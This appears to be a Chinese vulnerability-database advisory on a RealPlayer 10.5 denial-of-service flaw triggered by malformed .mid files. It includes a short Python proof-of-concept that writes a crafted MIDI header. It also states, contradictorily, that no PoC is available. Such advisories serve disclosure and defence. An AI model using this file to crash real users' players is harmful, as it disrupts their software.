RealNetworks RealPlayer .mid处理远程拒绝服务漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

RealNetworks RealPlayer是一款流行的媒体播放软件。 RealNetworks RealPlayer处理.mid文件存在安全问题,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 构建如下的恶意页面,诱使用户使用RealPlayer访问,可导致应用程序崩溃: print "-----------------------------------------------------------------------" print "# RealPlayer .mid file Denial of Service" print "# author: shinnai" print "# mail: shinnai[at]autistici[dot[org]" print "# site: http://shinnai.altervista.org" print "# based on sehato exploit, see: http://www.milw0rm.com/author/947" print "-----------------------------------------------------------------------" fileOut = open('test.mid','wb') fileOut.write('\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00') fileOut.close() Real Networks RealPlayer 10.5 v6.0.12.1235 Real Networks RealPlayer 10.5 v6.0.12.1069 Real Networks RealPlayer 10.5 v6.0.12.1059 Real Networks RealPlayer 10.5 v6.0.12.1056 Real Networks RealPlayer 10.5 v6.0.12.1053 Real Networks RealPlayer 10.5 v6.0.12.1040 Real...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息